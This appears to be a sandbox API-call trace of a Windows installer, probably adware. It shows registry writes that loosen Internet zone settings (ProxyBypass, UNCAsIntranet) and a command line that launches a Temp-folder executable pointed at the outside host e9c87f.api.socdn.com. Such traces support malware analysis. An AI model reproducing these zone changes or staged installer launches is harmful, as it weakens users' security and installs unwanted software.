#310520000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
Return=0
#310580000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
Return=0
#310590000
RegSetValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProxyBypass
type=REG_DWORD
data=1
Return=0
#310590000
RegSetValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\IntranetName
type=REG_DWORD
data=1
Return=0
#310590000
RegSetValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\UNCAsIntranet
type=REG_DWORD
data=1
Return=0
#310640000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
Return=0
#310690000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
Return=0
#310740000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
Return=0
#310920000
LoadLibrary
lpFileName=shell32.dll
Return=7c9c0000
#311120000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Return=0
#311120000
RegQueryValue
hKey=184\Cache
Return=0
#311160000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Return=0
#311160000
RegSetValue
hKey=184\Cache
type=REG_SZ
data=C:\Documents and Settings\ants\Local Settings\Temporary Internet Files
Return=0
#311170000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Return=0
#311170000
RegQueryValue
hKey=184\Cookies
Return=0
#311190000
RegCreateKey
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Return=0
#311190000
RegSetValue
hKey=184\Cookies
type=REG_SZ
data=C:\Documents and Settings\ants\Cookies
Return=0
#311540000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
Return=0
#311630000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Return=0
#311880000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{6fc0686a-6791-11e1-b81a-806d6172696f}\\Generation
Return=0
#311920000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
Return=0
#311970000
LoadLibrary
lpFileName=SHELL32.dll
Return=7c9c0000
#312230000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
Return=2
#312240000
RegQueryValue
hKey=7c\ShellState
Return=0
#312240000
RegQueryValue
hKey=7c\ShellState
Return=0
#312260000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn
Return=2
#312270000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
Return=2
#312290000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
Return=2
#312310000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
Return=2
#312320000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
Return=2
#312340000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
Return=2
#312360000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
Return=2
#312360000
RegQueryValue
hKey=7c\Advanced\Hidden
Return=0
#312370000
RegQueryValue
hKey=7c\Advanced\ShowCompColor
Return=0
#312370000
RegQueryValue
hKey=7c\Advanced\HideFileExt
Return=0
#312370000
RegQueryValue
hKey=7c\Advanced\DontPrettyPath
Return=0
#312370000
RegQueryValue
hKey=7c\Advanced\ShowInfoTip
Return=0
#312370000
RegQueryValue
hKey=7c\Advanced\HideIcons
Return=0
#312370000
RegQueryValue
hKey=7c\Advanced\MapNetDrvBtn
Return=0
#312380000
RegQueryValue
hKey=7c\Advanced\WebView
Return=0
#312380000
RegQueryValue
hKey=7c\Advanced\Filter
Return=0
#312380000
RegQueryValue
hKey=7c\Advanced\ShowSuperHidden
Return=2
#312380000
RegQueryValue
hKey=7c\Advanced\SeparateProcess
Return=0
#312380000
RegQueryValue
hKey=7c\Advanced\NoNetCrawling
Return=2
#312410000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\DocObject
Return=2
#312420000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\BrowseInPlace
Return=2
#312470000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\IsShortcut
Return=2
#312480000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\AlwaysShowExt
Return=0
#312490000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\Directory\NeverShowExt
Return=2
#312760000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
Return=2
#312870000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.exe
Return=0
#312980000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\DocObject
Return=2
#313000000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\BrowseInPlace
Return=2
#313040000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\IsShortcut
Return=2
#313050000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\AlwaysShowExt
Return=2
#313060000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\NeverShowExt
Return=2
#313100000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\.exe
Return=0
#313170000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\shell
Return=2
#313200000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\shell\open\command
Return=0
#313230000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\shell\open\command\command
Return=2
#313270000
RegQueryValue
hKey=HKEY_CLASSES_ROOT\exefile\shell\open\command
Return=0
#313370000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\LangID
Return=0
#313370000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe
Return=2
#313380000
LoadLibrary
lpFileName=VERSION.dll
Return=77c00000
#313480000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=19c
#313560000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=19c
#313590000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\CutList
Return=0
#313600000
RegQueryValue
hKey=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\CutList
Return=0
#313630000
RegSetValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe
type=REG_SZ
data=install manager
Return=0
#313650000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=198
#313700000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
Return=2
#313720000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
Return=2
#313730000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
Return=2
#313770000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRunasInstallPrompt
Return=2
#315110000
RegQueryValue
hKey=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
Return=0
#315150000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#313790000
CreateProcessInternal
lpApplicationName=C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe" ins.exe /h e9c87f.api.socdn.com /u 533159ad-21e4-4882-9d46-66d30a000013 /e 1265
Return=1
#313790000
CreateProcess
lpApplicationName=C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\n6798\s6798.exe" ins.exe /h e9c87f.api.socdn.com /u 533159ad-21e4-4882-9d46-66d30a000013 /e 1265
Return=1
